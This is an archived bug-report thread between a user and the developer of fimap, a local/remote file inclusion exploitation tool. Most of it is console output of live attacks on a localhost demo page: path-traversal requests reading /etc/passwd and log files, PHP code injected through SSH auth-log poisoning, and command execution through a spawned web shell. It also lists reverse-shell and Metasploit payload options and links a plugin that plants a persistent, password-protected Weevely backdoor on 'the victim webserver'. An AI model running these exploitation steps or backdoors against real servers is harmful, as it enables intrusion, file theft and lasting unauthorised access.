Closed GoogleCodeExporter closed 9 years ago
UPDATE: With blind mode flag it actually DOES work, however older versions of
fimap did not need this flag set. I will just make sure to be using the Blind
Mode from now on, though I hope the example gives you some ideas :)
root@bt:/pentest/web/fimap# ./fimap.py -b -v 3 -u
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
[14:54:00] [DEBUG] Mindepth (0) and Maxdepth (15) loaded from generic.xml.
[14:54:00] [DEBUG] Loaded XML-LD for 'PHP' at revision 3 by Iman Karim
(ikarim2s@smail.inf.fh-brs.de)
[14:54:00] [DEBUG] XML-LD has no payload(s) defined!
[14:54:00] [DEBUG] XML-LD (Perl) has no eval_kickstarter method defined.
[14:54:00] [DEBUG] Language will not be able to use logfile-injection.
[14:54:00] [DEBUG] XML-LD (Perl) has no write_file method defined.
[14:54:00] [DEBUG] Language will not be able to write files.
[14:54:00] [DEBUG] XML-LD has no readfile patterns defined!
[14:54:00] [DEBUG] No readfile bugs can be scanned if this is not defined.
[14:54:00] [DEBUG] XML-LD has no extentions defined!
[14:54:00] [DEBUG] Loaded XML-LD for 'Perl' at revision 1 by Iman Karim
(ikarim2s@smail.inf.fh-brs.de)
[14:54:00] [DEBUG] Trying to load plugin 'TempFileAbuse'...
[14:54:00] [DEBUG] [PHPInfo version 1]
[14:54:00] [DEBUG] Autor: Iman Karim
[14:54:00] [DEBUG] Email: fimap.dev@gmail.com
[14:54:00] [DEBUG] URL : http://fimap.googlecode.com
[14:54:00] [DEBUG] Trying to load plugin 'msf'...
[14:54:00] [DEBUG] [msf_bindings version 1]
[14:54:00] [DEBUG] Autor: Xavier Garcia
[14:54:00] [DEBUG] Email: xavi.garcia@gmail.com
[14:54:00] [DEBUG] URL : http://fimap.googlecode.com
[14:54:00] [DEBUG] Trying to load plugin 'test_plugin'...
[14:54:00] [DEBUG] [Test Plugin version 1]
[14:54:00] [DEBUG] Autor: Iman Karim
[14:54:00] [DEBUG] Email: fimap.dev@gmail.com
[14:54:00] [DEBUG] URL : http://fimap.googlecode.com
[14:54:00] [DEBUG] 3 plugins loaded.
Blind FI-error checking enabled.
SingleScan is testing URL:
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'
[14:54:00] [OUT] Inspecting URL
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'...
[14:54:00] [DEBUG] Analyzing provided GET params...
[14:54:00] [DEBUG] Token found: [file] = [contactus.php]
[14:54:00] [DEBUG] Analyzing provided POST params...
[14:54:00] [DEBUG] No POST params provided.
[14:54:00] [DEBUG] Analyzing provided headers...
[14:54:00] [DEBUG] No headers provided.
[14:54:00] [INFO] Fiddling around with URL...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=SEUmBVA9' with POST('')...
[14:54:00] [INFO] Sniper failed. Going blind...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=/etc/passwd' with POST('')...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=/etc/passwd%00' with POST('')...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=/../etc/passwd' with POST('')...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=/../etc/passwd%00' with
POST('')...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=/../../etc/passwd' with
POST('')...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=/../../etc/passwd%00' with
POST('')...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=/../../../etc/passwd' with
POST('')...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=/../../../etc/passwd%00' with
POST('')...
[14:54:00] [DEBUG] Requesting:
'http://localhost/inclusiondemo/lfi1.php?file=/../../../../etc/passwd' with
POST('')...
[14:54:00] [OUT] Possible file inclusion found blindly! ->
'http://localhost/inclusiondemo/lfi1.php?file=/../../../../etc/passwd' with
Parameter 'file'.
[14:54:00] [OUT] Identifying Vulnerability
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php' with Parameter
'file' blindly...
[14:54:00] [WARN] Unknown language - Autodetecting...
[14:54:00] [INFO] Autodetect thinks this could be a PHP-Script...
[14:54:00] [INFO] If you think this is wrong start fimap with --no-auto-detect
[14:54:00] [DEBUG] Testing default files...
[14:54:00] [INFO] Testing file '/etc/passwd'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//etc/passwd
[14:54:00] [DEBUG] Skipping file 'c:\boot.ini' because it's not suitable for
our OS.
[14:54:00] [INFO] Testing file '/proc/self/environ'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//proc/self/environ
[14:54:00] [DEBUG] Skipping file 'c:\windows\win.ini' because it's not suitable
for our OS.
[14:54:00] [DEBUG] Testing absolute files...
[14:54:00] [INFO] Skipping absolute file 'php://input'.
[14:54:00] [DEBUG] Testing log files...
[14:54:00] [INFO] Testing file '/var/log/apache2/access.log'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/apache2/acces
s.log
[14:54:00] [INFO] Testing file '/var/log/apache/access.log'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/apache/access
.log
[14:54:00] [INFO] Testing file '/var/log/httpd/access.log'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/httpd/access.
log
[14:54:00] [INFO] Testing file '/var/log/apache2/access_log'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/apache2/acces
s_log
[14:54:00] [INFO] Testing file '/var/log/apache/access_log'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/apache/access
_log
[14:54:00] [INFO] Testing file '/var/log/httpd/access_log'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/httpd/access_
log
[14:54:00] [INFO] Testing file '/var/log/auth.log'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/auth.log
[14:54:00] [INFO] Testing file '/var/log/secure'...
[14:54:00] [DEBUG] Testing URL:
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/secure
[14:54:00] [DEBUG] Testing remote inclusion...
[14:54:00] [INFO] Skipping remote file 'http://www.phpbb.de/index.php'.
[14:54:00] [DEBUG] Saving results to '/root/fimap_result.xml'...
###############################################################################
#[1] Possible PHP-File Inclusion #
###############################################################################
#::REQUEST #
# [URL] http://localhost/inclusiondemo/lfi1.php?file=contactus.php #
# [HEAD SENT] #
#::VULN INFO #
# [GET PARAM] file #
# [PATH] Not received (Blindmode) #
# [OS] Unix #
# [TYPE] Blindly Identified #
# [TRUNCATION] Not tested. #
# [READABLE FILES] #
# [0] /etc/passwd -> /../../../../etc/passwd #
# [1] /var/log/auth.log -> /../../../../var/log/auth.log #
###############################################################################
root@bt:/pentest/web/fimap#
Original comment by the.info...@gmail.com
on 21 Mar 2012 at 2:55
Ok, another bug!
root@bt:/pentest/web/fimap# ./fimap.py -x
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
###########################
#:: List of Domains :: #
###########################
#[1] localhost #
#[q] Quit #
###########################
Choose Domain: 1
################################################################################
#######################################
#:: FI Bugs on 'localhost' ::
#
################################################################################
#######################################
#[1] URL: '/inclusiondemo/lfi1.php?file=contactus.php' injecting file:
'/var/log/auth.log' using GET-param: 'file' #
#[q] Quit
#
################################################################################
#######################################
Choose vulnerable script: 1
[13:11:33] [INFO] Testing PHP-code injection thru Logfile
SSH-Username-Injection...
[13:11:33] [INFO] Testing if log kickstarter is present...
[13:11:33] [INFO] Kickstarter found!
[13:11:33] [OUT] PHP Injection works! Testing if execution works...
[13:11:33] [INFO] Testing execution thru 'popen[b64]'...
[13:11:33] [OUT] Execution thru 'popen[b64]' works!
######################################################
#:: Available Attacks - PHP and SHELL access :: #
######################################################
#[1] Spawn fimap shell #
#[2] Spawn pentestmonkey's reverse shell #
#[3] [msf_bindings] Executes MSF reverse payloads #
#[4] [Test Plugin] Show some info #
#[q] Quit #
######################################################
Choose Attack: 1
Please wait - Setting up shell (one request)...
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
-------------------------------------------
fishell@www-data:/var/www/inclusiondemo$> whoami
www-data
fishell@www-data:/var/www/inclusiondemo$> uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
fishell@www-data:/var/www/inclusiondemo$> cd ../
Traceback (most recent call last):
File "./fimap.py", line 472, in <module>
list_results(onlyExploitable=showOnlyExploitable)
File "./fimap.py", line 221, in list_results
c.start(onlyExploitable)
File "/pentest/web/fimap/codeinjector.py", line 419, in start
cmd = item.generatePayload(cmds)
NameError: global name 'item' is not defined
The "cd" and "ls" commands both cause crashes. I had luck using ls -al instead
of ls, but even cd .. instead of cd ../ cause crash. No idea why...
The "id" command seems to dump a log of the /var/log/auth.log file instead of
executing commands also. Very odd bug :P
Pentestmonkeys reverse shell also seems to cause bugs, will continue the bug
hunt though!
Original comment by the.info...@gmail.com
on 26 Mar 2012 at 1:14
Crash on executing MSF plugin payload:
######################################################
#:: Available Attacks - PHP and SHELL access :: #
######################################################
#[1] Spawn fimap shell #
#[2] Spawn pentestmonkey's reverse shell #
#[3] [msf_bindings] Executes MSF reverse payloads #
#[4] [Test Plugin] Show some info #
#[q] Quit #
######################################################
Choose Attack: 3
Traceback (most recent call last):
File "/pentest/web/fimap/fimap.py", line 472, in <module>
list_results(onlyExploitable=showOnlyExploitable)
File "/pentest/web/fimap/fimap.py", line 221, in list_results
c.start(onlyExploitable)
File "/pentest/web/fimap/codeinjector.py", line 443, in start
haxhelper = HaxHelper(self, url, postdata, mode, langClass, suffix, isUnix, sys_inject_works, item)
NameError: global name 'item' is not defined
Original comment by the.info...@gmail.com
on 27 Mar 2012 at 1:37
Hi the.infodox,
Sorry for my insane late response. University just started and I actually going
now to school to finish the shit :)
But back to topic.
As you already discovered, fimap checks by default only for visible bugs.
That means that the PHP (or whatever) error message has to be visible.
I called it "sniper" in fimap. So if you read something about "Sniper failed"
you know that fimap failed to identify a bug because the error pattern was not
found.
You also already found out that you can enable blind mode. If you enabled
blindmode fimap still first tries to "snipe" the site. Since this is really
cheap there is no reason not to try it. When sniping failed, the pathes will be
bruteforced blindly and fimap hopes to find content of the injected file.
This mode however is really verbose and obvious in the logfiles. But needed if
errors are disabled like in your case.
As for the other bugs you posted, I will check them out these days if I have
time.
Should be easily fixed.
Thank you very much for taking your time and giving such a great feedback!
-imax.
Original comment by fimap....@gmail.com
on 12 Apr 2012 at 8:32
No worries about delayed replies, I myself have exams in the Uni now.
I figure that most of the post-shell inject bugs are due to the nature of the
exploit method - auth log injection - which is probably not the most reliable
of methods compared to say, error log.
A suggestion though would to be once you "inject" the shell via logfile, to
have an option to upload a more permenant shell - for example the Weevely
shell. I am currently trying to write such a plugin, and now have it getting as
far as almost-running before it crashes :)
Original comment by the.info...@gmail.com
on 12 Apr 2012 at 11:28
Error in HaxHelper.uploadfile
#[6] [reverse http shell] Loads a reverse HTTP shell #
#[q] Quit #
#########################################################
Choose Attack: 6
Traceback (most recent call last):
File "fimap.py", line 472, in <module>
list_results(onlyExploitable=showOnlyExploitable)
File "fimap.py", line 221, in list_results
c.start(onlyExploitable)
File "/pentest/web/fimap/codeinjector.py", line 443, in start
haxhelper = HaxHelper(self, url, postdata, mode, langClass, suffix, isUnix, sys_inject_works, item)
NameError: global name 'item' is not defined
Thats using the following plugin (which, BTW, you should add to the trusted
list!)
http://code.google.com/p/ghosthunter/source/browse/#svn%2Ftrunk%2Ffimap%2Fplugin
s%2Freversehttp
Now I saw the same error whenever I tried using the uploadfile thing, so I
believe it is due to a bug in "item". Either that or we are using the
uploadfile thing wrong. Not sure which.
Will keep submitting bug reports anyway :)
Original comment by the.info...@gmail.com
on 12 Apr 2012 at 11:36
Hi the.infodox!
I just found and fixed the bug with the missing "item" variable.
I forgot to rename the "item" variable to "working_shell" during my
refactorings.
Epic fail. At least this bug should be solved now and you should be able to use
most of the stuff.
If you have some time please verify that and let me know :)
Cheers and sorry for the stupid bug,
-imax.
Original comment by fimap....@gmail.com
on 13 Apr 2012 at 5:31
The bug is fixed :D All works fine, however I now know auth.log is NOT a good
place to inject also - try putting in the "pwd" command, etc, into authlog and
it goes insane :P
BTW, I wrote a plugin last night, still in "beta" kind of as I need to fix a
few small bugs:
http://insecurety.net/Downloads/weevils.tar.gz
It uploads a Weevely backdoor onto the victim webserver giving a "Persistent"
password protected shell you can use :)
Original comment by the.info...@gmail.com
on 13 Apr 2012 at 10:32
[deleted comment]
Original issue reported on code.google.com by
the.info...@gmail.com
on 21 Mar 2012 at 2:50